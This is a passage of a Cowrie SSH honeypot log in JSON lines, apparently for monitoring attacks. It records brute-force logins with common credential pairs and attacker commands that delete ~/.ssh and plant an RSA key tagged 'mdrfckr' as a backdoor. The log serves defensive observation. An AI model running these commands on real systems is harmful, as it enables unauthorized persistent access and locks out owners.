03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:58:43.428107Z","src_ip":"118.26.39.178","session":"24344645b4d9"}
{"eventid":"cowrie.login.success","username":"root","password":"toor1234","message":"login attempt [root/toor1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:58:44.248554Z","src_ip":"118.26.39.178","session":"24344645b4d9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:58:44.709904Z","src_ip":"118.26.39.178","session":"24344645b4d9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:58:44.710710Z","src_ip":"118.26.39.178","session":"24344645b4d9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:58:44.711988Z","src_ip":"118.26.39.178","session":"24344645b4d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:58:44.920040Z","src_ip":"118.26.39.178","session":"24344645b4d9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:58:45.829762Z","src_ip":"118.26.39.178","session":"24344645b4d9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:58:45.830414Z","src_ip":"118.26.39.178","session":"24344645b4d9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:58:46.042432Z","src_ip":"118.26.39.178","session":"24344645b4d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:58:46.043361Z","src_ip":"118.26.39.178","session":"24344645b4d9"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":39296,"dst_ip":"1.2.3.4","dst_port":22,"session":"923ddbf32ab7","protocol":"ssh","message":"New connection: 118.26.39.178:39296 (1.2.3.4:22) [session: 923ddbf32ab7]","sensor":"my-vps","timestamp":"2025-09-09T06:58:46.354708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:58:46.355594Z","src_ip":"118.26.39.178","session":"923ddbf32ab7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:58:48.409689Z","src_ip":"118.26.39.178","session":"923ddbf32ab7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:58:49.184347Z","src_ip":"118.26.39.178","session":"923ddbf32ab7"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:58:50.446626Z","src_ip":"118.26.39.178","session":"923ddbf32ab7"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":37518,"dst_ip":"1.2.3.4","dst_port":22,"session":"121627f651b9","protocol":"ssh","message":"New connection: 118.26.39.178:37518 (1.2.3.4:22) [session: 121627f651b9]","sensor":"my-vps","timestamp":"2025-09-09T06:58:50.706183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:58:50.706844Z","src_ip":"118.26.39.178","session":"121627f651b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:58:50.964779Z","src_ip":"118.26.39.178","session":"121627f651b9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:58:52.041906Z","src_ip":"118.26.39.178","session":"121627f651b9"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:58:52.245918Z","src_ip":"118.26.39.178","session":"24344645b4d9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:58:52.301806Z","src_ip":"118.26.39.178","session":"121627f651b9"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":54840,"dst_ip":"1.2.3.4","dst_port":22,"session":"d402b43bcebf","protocol":"ssh","message":"New connection: 92.118.39.62:54840 (1.2.3.4:22) [session: d402b43bcebf]","sensor":"my-vps","timestamp":"2025-09-09T06:59:01.814556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:59:01.815525Z","src_ip":"92.118.39.62","session":"d402b43bcebf"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:59:01.845901Z","src_ip":"92.118.39.62","session":"d402b43bcebf"}
{"eventid":"cowrie.login.failed","username":"clay","password":"clay123","message":"login attempt [clay/clay123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:59:01.938470Z","src_ip":"92.118.39.62","session":"d402b43bcebf"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:59:02.972219Z","src_ip":"92.118.39.62","session":"d402b43bcebf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53467,"dst_ip":"1.2.3.4","dst_port":22,"session":"311ad511280e","protocol":"ssh","message":"New connection: 212.227.235.229:53467 (1.2.3.4:22) [session: 311ad511280e]","sensor":"my-vps","timestamp":"2025-09-09T06:59:40.883383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:59:40.884161Z","src_ip":"212.227.235.229","session":"311ad511280e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:59:41.127756Z","src_ip":"212.227.235.229","session":"311ad511280e"}
{"eventid":"cowrie.login.failed","username":"grid","password":"12345678","message":"login attempt [grid/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T06:59:42.143237Z","src_ip":"212.227.235.229","session":"311ad511280e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:59:43.389246Z","src_ip":"212.227.235.229","session":"311ad511280e"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":58454,"dst_ip":"1.2.3.4","dst_port":22,"session":"65c9853f15b8","protocol":"ssh","message":"New connection: 118.26.39.178:58454 (1.2.3.4:22) [session: 65c9853f15b8]","sensor":"my-vps","timestamp":"2025-09-09T07:00:02.235463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:00:02.236615Z","src_ip":"118.26.39.178","session":"65c9853f15b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:00:02.496953Z","src_ip":"118.26.39.178","session":"65c9853f15b8"}
{"eventid":"cowrie.login.failed","username":"jake","password":"jake@123","message":"login attempt [jake/jake@123] failed","sensor":"my-vps","timestamp":"2025-09-09T07:00:03.580803Z","src_ip":"118.26.39.178","session":"65c9853f15b8"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:00:04.842781Z","src_ip":"118.26.39.178","session":"65c9853f15b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38096,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8254bb7c27b","protocol":"ssh","message":"New connection: 212.227.235.229:38096 (1.2.3.4:22) [session: d8254bb7c27b]","sensor":"my-vps","timestamp":"2025-09-09T07:00:57.262800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:00:57.263635Z","src_ip":"212.227.235.229","session":"d8254bb7c27b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:00:57.508752Z","src_ip":"212.227.235.229","session":"d8254bb7c27b"}
{"eventid":"cowrie.login.success","username":"root","password":"1020304050","message":"login attempt [root/1020304050] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:00:58.527092Z","src_ip":"212.227.235.229","session":"d8254bb7c27b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:00:59.035438Z","src_ip":"212.227.235.229","session":"d8254bb7c27b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:00:59.036094Z","src_ip":"212.227.235.229","session":"d8254bb7c27b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:00:59.037280Z","src_ip":"212.227.235.229","session":"d8254bb7c27b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:00:59.283021Z","src_ip":"212.227.235.229","session":"d8254bb7c27b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:00:59.874804Z","src_ip":"212.227.235.229","session":"d8254bb7c27b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:00:59.875472Z","src_ip":"212.227.235.229","session":"d8254bb7c27b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:01:00.122130Z","src_ip":"212.227.235.229","session":"d8254bb7c27b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:01:00.123035Z","src_ip":"212.227.235.229","session":"d8254bb7c27b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38765,"dst_ip":"1.2.3.4","dst_port":22,"session":"d760d98f454d","protocol":"ssh","message":"New connection: 212.227.235.229:38765 (1.2.3.4:22) [session: d760d98f454d]","sensor":"my-vps","timestamp":"2025-09-09T07:01:00.365916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:01:00.366858Z","src_ip":"212.227.235.229","session":"d760d98f454d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:01:00.611032Z","src_ip":"212.227.235.229","session":"d760d98f454d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:01:01.633621Z","src_ip":"212.227.235.229","session":"d760d98f454d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:01:02.881489Z","src_ip":"212.227.235.229","session":"d760d98f454d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39177,"dst_ip":"1.2.3.4","dst_port":22,"session":"97f0050b7f8f","protocol":"ssh","message":"New connection: 212.227.235.229:39177 (1.2.3.4:22) [session: 97f0050b7f8f]","sensor":"my-vps","timestamp":"2025-09-09T07:01:03.121744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:01:03.123302Z","src_ip":"212.227.235.229","session":"97f0050b7f8f"}
